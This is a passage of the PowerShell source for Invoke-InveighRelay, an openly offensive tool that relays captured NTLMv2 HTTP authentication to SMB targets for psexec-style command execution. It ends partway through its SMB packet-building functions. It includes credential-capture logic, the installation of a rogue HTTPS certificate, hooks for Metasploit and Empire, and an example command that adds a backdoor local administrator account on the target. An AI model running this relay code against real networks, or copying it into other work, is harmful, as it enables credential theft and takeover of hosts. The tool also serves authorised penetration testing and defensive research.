function Invoke-InveighRelay { <# .SYNOPSIS Invoke-InveighRelay performs NTLMv2 HTTP to SMB relay with psexec style command execution. .DESCRIPTION Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB1/SMB2 relay with psexec style command execution. HTTP/HTTPS to SMB NTLMv2 relay with granular control Supports SMB1 and SMB2 targets Does not require priveleged access on the Invoke-InveighRelay host The Invoke-InveighRelay host can be targeted for privilege escalation NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS Granular control of console and file output .PARAMETER Command Command to execute on SMB relay target. Use PowerShell character escapes where necessary. .PARAMETER Target IP address of system to target for SMB relay. .PARAMETER Service Default = 20 Character Random: Name of the service to create and delete on the target. .PARAMETER HTTP Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. .PARAMETER HTTPIP Default = Any: IP address for the HTTP/HTTPS listener. .PARAMETER HTTPPort Default = 80: TCP port for the HTTP listener. .PARAMETER HTTPS Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, manually remove the certificate. This feature requires local administrator access. .PARAMETER HTTPSPort Default = 443: TCP port for the HTTPS listener. .PARAMETER HTTPSCertIssuer Default = Inveigh: The issuer field for the cert that will be installed for HTTPS. .PARAMETER HTTPSCertSubject Default = localhost: The subject field for the cert that will be installed for HTTPS. .PARAMETER HTTPSForceCertDelete Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. .PARAMETER Challenge Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. .PARAMETER MachineAccounts Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. .PARAMETER WPADAuth Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. .PARAMETER Usernames Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. .PARAMETER RelayAutoDisable Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on target. .PARAMETER ConsoleOutput Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. .PARAMETER FileOutput Default = Disabled: (Y/N) Enable/Disable real time file output. .PARAMETER StatusOutput Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. .PARAMETER OutputStreamOnly Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. .PARAMETER OutputDir Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. .PARAMETER RunTime (Integer) Run time duration in minutes. .PARAMETER SMB1 (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. .PARAMETER StartupChecks Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. .PARAMETER ShowHelp Default = Enabled: (Y/N) Enable/Disable the help messages at startup. .PARAMETER Tool Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. 0 = None, 1 = Metasploit/Meterpreter, 2 = Empire .EXAMPLE Invoke-Inveigh -HTTP N Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Winter2017 /add && net localgroup administrators Inveigh /add" .LINK https://github.com/Kevin-Robertson/Inveigh #> # Parameter default values can be modified in this section: [CmdletBinding()] param ( [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y", [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM", [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", [parameter(Mandatory=$false)][Array]$Usernames = "", [parameter(Mandatory=$false)][Int]$HTTPPort = "80", [parameter(Mandatory=$false)][Int]$HTTPSPort = "443", [parameter(Mandatory=$false)][Int]$RunTime = "", [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh", [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost", [parameter(Mandatory=$false)][String]$Service, [parameter(Mandatory=$true)][String]$Command = "", [parameter(Mandatory=$true)][String]$Target = "", [parameter(Mandatory=$false)][Switch]$SMB1, [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) if ($invalid_parameter) { Write-Output "Error:$($invalid_parameter) is not a valid parameter." throw } if(!$OutputDir) { $output_directory = $PWD.Path } else { $output_directory = $OutputDir } if(!$inveigh) { $global:inveigh = [HashTable]::Synchronized(@{}) $inveigh.log = New-Object System.Collections.ArrayList $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList $inveigh.cleartext_list = New-Object System.Collections.ArrayList $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList $inveigh.valid_host_list = New-Object System.Collections.ArrayList } if($inveigh.relay_running) { Write-Output "Error:Invoke-InveighRelay is already running, use Stop-Inveigh" throw } if(!$inveigh.running -or !$inveigh.unprivileged_running) { $inveigh.console_queue = New-Object System.Collections.ArrayList $inveigh.status_queue = New-Object System.Collections.ArrayList $inveigh.log_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.console_output = $false $inveigh.console_input = $true $inveigh.file_output = $false $inveigh.HTTPS_existing_certificate = $false $inveigh.HTTPS_force_certificate_delete = $false $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" } $inveigh.relay_running = $true $inveigh.SMB_relay = $true if($StatusOutput -eq 'Y') { $inveigh.status_output = $true } else { $inveigh.status_output = $false } if($OutputStreamOnly -eq 'Y') { $inveigh.output_stream_only = $true } else { $inveigh.output_stream_only = $false } if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension { $inveigh.tool = 1 $inveigh.output_stream_only = $true $inveigh.newline = "" $ConsoleOutput = "N" } elseif($Tool -eq 2) # PowerShell Empire { $inveigh.tool = 2 $inveigh.output_stream_only = $true $inveigh.console_input = $false $inveigh.newline = "`n" $ConsoleOutput = "Y" $ShowHelp = "N" } else { $inveigh.tool = 0 $inveigh.newline = "" } # Write startup messages $inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null if($StartupChecks -eq 'Y') { $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} } if($firewall_status) { $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2 $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}" if($firewall_powershell) { $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null } } if($HTTP -eq 'Y') { if($StartupChecks -eq 'Y') { $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort " } if($HTTP_port_check) { $HTTP = "N" $inveigh.HTTP = $false $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null } else { $inveigh.HTTP = $true $inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null if($HTTPIP) { $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null } if($HTTPPort -ne 80) { $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null } } } else { $inveigh.HTTP = $false $inveigh.status_queue.Add("HTTP Capture/Relay = Disabled") > $null } if($HTTPS -eq 'Y') { if($StartupChecks -eq 'Y') { $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort " } if($HTTPS_port_check) { $HTTPS = "N" $inveigh.HTTPS = $false $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port $HTTPSPort") > $null } else { try { $inveigh.certificate_issuer = $HTTPSCertIssuer $inveigh.certificate_CN = $HTTPSCertSubject $inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null $inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer}) if(!$certificate_check) { # credit to subTee for cert creation code https://github.com/subTee/Interceptor $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName" $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName" $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey" $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider" $certificate_key.KeySpec = 2 $certificate_key.Length = 2048 $certificate_key.MachineContext = 1 $certificate_key.Create() $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId" $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1") $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1" $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID) $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage" $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID) $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate" $certificate.InitializeFromPrivateKey(2,$certificate_key,"") $certificate.Subject = $certificate_distinguished_name $certificate.Issuer = $certificate_issuer_distinguished_name $certificate.NotBefore = (get-date).AddDays(-271) $certificate.NotAfter = $certificate.NotBefore.AddDays(824) $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256") $certificate.HashAlgorithm = $certificate_hash_algorithm_OID $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension) $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints" $certificate_basic_constraints.InitializeEncode("true",1) $certificate.X509Extensions.Add($certificate_basic_constraints) $certificate.Encode() $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment" $certificate_enrollment.InitializeFromRequest($certificate) $certificate_data = $certificate_enrollment.CreateRequest(0) $certificate_enrollment.InstallResponse(2,$certificate_data,0,"") $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer}) $inveigh.HTTPS = $true $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled") > $null } else { if($HTTPSForceCertDelete -eq 'Y') { $inveigh.HTTPS_force_certificate_delete = $true } $inveigh.HTTPS_existing_certificate = $true $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null } } catch { $HTTPS = "N" $inveigh.HTTPS = $false $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Error") > $null } } } else { $inveigh.status_queue.Add("HTTPS Capture/Relay = Disabled") > $null } if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') { if($Challenge) { $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null } if($MachineAccounts -eq 'N') { $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null $inveigh.machine_accounts = $false } else { $inveigh.machine_accounts = $true } $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null } $inveigh.status_queue.Add("Relay Target = $Target") > $null if($Usernames) { if($Usernames.Count -eq 1) { $inveigh.status_queue.Add("Relay Username = " + ($Usernames -join ",")) > $null } else { $inveigh.status_queue.Add("Relay Usernames = " + ($Usernames -join ",")) > $null } } if($RelayAutoDisable -eq 'Y') { $inveigh.status_queue.Add("Relay Auto Disable = Enabled") > $null } else { $inveigh.status_queue.Add("Relay Auto Disable = Disabled") > $null } if($Service) { $inveigh.status_queue.Add("Relay Service = $Service") > $null } if($SMB1) { $inveigh.status_queue.Add("SMB Version = SMB1") > $null $SMB_version = 'SMB1' } if($ConsoleOutput -eq 'Y') { $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null $inveigh.console_output = $true } else { if($inveigh.tool -eq 1) { $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null } else { $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null } } if($FileOutput -eq 'Y') { if($inveigh.file_output) { $inveigh.file_output = $false } else { $inveigh.file_output = $true } $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null $inveigh.status_queue.Add("Output Directory = $output_directory") > $null $inveigh.file_output = $true } else { $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null } if($RunTime -eq 1) { $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null } elseif($RunTime -gt 1) { $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null } if($ShowHelp -eq 'Y') { $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Relay") > $null if($inveigh.console_output) { $inveigh.status_queue.Add("Press any key to stop real time console output") > $null } } if($inveigh.status_output) { while($inveigh.status_queue.Count -gt 0) { if($inveigh.output_stream_only) { Write-Output($inveigh.status_queue[0] + $inveigh.newline) $inveigh.status_queue.RemoveAt(0) } else { switch -Wildcard ($inveigh.status_queue[0]) { "* Disabled Due To *" { Write-Warning($inveigh.status_queue[0]) $inveigh.status_queue.RemoveAt(0) } "Run Stop-Inveigh to stop Inveigh-Relay" { Write-Warning($inveigh.status_queue[0]) $inveigh.status_queue.RemoveAt(0) } "Windows Firewall = Enabled" { Write-Warning($inveigh.status_queue[0]) $inveigh.status_queue.RemoveAt(0) } default { Write-Output($inveigh.status_queue[0]) $inveigh.status_queue.RemoveAt(0) } } } } } $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) $process_ID = $process_ID -replace "-00-00","" [Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} # Begin ScriptBlocks # Shared Basic functions ScriptBlock $shared_basic_functions_scriptblock = { function DataLength2 { param ([Int]$length_start,[Byte[]]$string_extract_data) $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) return $string_length } function DataLength4 { param ([Int]$length_start,[Byte[]]$string_extract_data) $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0) return $string_length } function DataToString { param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data) $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)]) $string_data = $string_data -replace "-00","" $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $string_extract = New-Object System.String ($string_data,0,$string_data.Length) return $string_extract } } # Irkin functions ScriptBlock $irkin_functions_scriptblock = { function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #NetBIOS function Get-PacketNetBIOSSessionService() { param([Int]$packet_header_length,[Int]$packet_data_length) [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length) $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0] $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type",[Byte[]](0x00)) $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length",[Byte[]]($packet_netbios_session_service_length)) return $packet_NetBIOSSessionService } #SMB1 function Get-PacketSMBHeader() { param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBHeader.Add("SMBHeader_Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) $packet_SMBHeader.Add("SMBHeader_Command",$packet_command) $packet_SMBHeader.Add("SMBHeader_ErrorClass",[Byte[]](0x00)) $packet_SMBHeader.Add("SMBHeader_Reserved",[Byte[]](0x00)) $packet_SMBHeader.Add("SMBHeader_ErrorCode",[Byte[]](0x00,0x00)) $packet_SMBHeader.Add("SMBHeader_Flags",$packet_flags) $packet_SMBHeader.Add("SMBHeader_Flags2",$packet_flags2) $packet_SMBHeader.Add("SMBHeader_ProcessIDHigh",[Byte[]](0x00,0x00)) $packet_SMBHeader.Add("SMBHeader_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_SMBHeader.Add("SMBHeader_Reserved2",[Byte[]](0x00,0x00)) $packet_SMBHeader.Add("SMBHeader_TreeID",$packet_tree_ID) $packet_SMBHeader.Add("SMBHeader_ProcessID",$packet_process_ID) $packet_SMBHeader.Add("SMBHeader_UserID",$packet_user_ID) $packet_SMBHeader.Add("SMBHeader_MultiplexID",[Byte[]](0x00,0x00)) return $packet_SMBHeader } function Get-PacketSMBNegotiateProtocolRequest() { param([String]$packet_version) if($packet_version -eq 'SMB1') { [Byte[]]$packet_byte_count = 0x0c,0x00 } else { [Byte[]]$packet_byte_count = 0x22,0x00 } $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount",[Byte[]](0x00)) $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount",$packet_byte_count) $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02)) $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00)) if($packet_version -ne 'SMB1') { $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02)) $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00)) $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02)) $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00)) } return $packet_SMBNegotiateProtocolRequest } function Get-PacketSMBSessionSetupAndXRequest() { param([Byte[]]$packet_security_blob) [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length) $packet_byte_count = $packet_byte_count[0,1] [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5) $packet_security_blob_length = $packet_security_blob_length[0,1] $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount",[Byte[]](0x0c)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand",[Byte[]](0xff)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved",[Byte[]](0x00)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer",[Byte[]](0xff,0xff)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount",[Byte[]](0x02,0x00)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber",[Byte[]](0x01,0x00)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength",$packet_byte_count) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities",[Byte[]](0x44,0x00,0x00,0x80)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount",$packet_security_blob_length) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob",$packet_security_blob) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS",[Byte[]](0x00,0x00,0x00)) $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage",[Byte[]](0x00,0x00)) return $packet_SMBSessionSetupAndXRequest } function Get-PacketSMBTreeConnectAndXRequest() { param([Byte[]]$packet_path) [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7) $packet_path_length = $packet_path_length[0,1] $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount",[Byte[]](0x04)) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand",[Byte[]](0xff)) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved",[Byte[]](0x00)) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags",[Byte[]](0x00,0x00)) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength",[Byte[]](0x01,0x00)) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount",$packet_path_length) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password",[Byte[]](0x00)) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree",$packet_path) $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00)) return $packet_SMBTreeConnectAndXRequest } function Get-PacketSMBNTCreateAndXRequest() { param([Byte[]]$packet_named_pipe) [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length) $packet_named_pipe_length = $packet_named_pipe_length[0,1] [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1) $packet_file_name_length = $packet_file_name_length[0,1] $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount",[Byte[]](0x18)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand",[Byte[]](0xff)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved",[Byte[]](0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2",[Byte[]](0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen",$packet_file_name_length) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags",[Byte[]](0x16,0x00,0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask",[Byte[]](0x00,0x00,0x00,0x02)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess",[Byte[]](0x07,0x00,0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition",[Byte[]](0x01,0x00,0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation",[Byte[]](0x02,0x00,0x00,0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags",[Byte[]](0x00)) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount",$packet_named_pipe_length) $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename",$packet_named_pipe) return $packet_SMBNTCreateAndXRequest } function Get-PacketSMBReadAndXRequest() { $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount",[Byte[]](0x0a)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand",[Byte[]](0xff)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved",[Byte[]](0x00)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID",[Byte[]](0x00,0x40)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow",[Byte[]](0x58,0x02)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount",[Byte[]](0x58,0x02)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown",[Byte[]](0xff,0xff,0xff,0xff)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining",[Byte[]](0x00,0x00)) $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount",[Byte[]](0x00,0x00)) return $packet_SMBReadAndXRequest } function Get-PacketSMBWriteAndXRequest() { param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length) [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length) $packet_write_length = $packet_write_length[0,1] $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount",[Byte[]](0x0e)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand",[Byte[]](0xff)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved",[Byte[]](0x00)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID",$packet_file_ID) 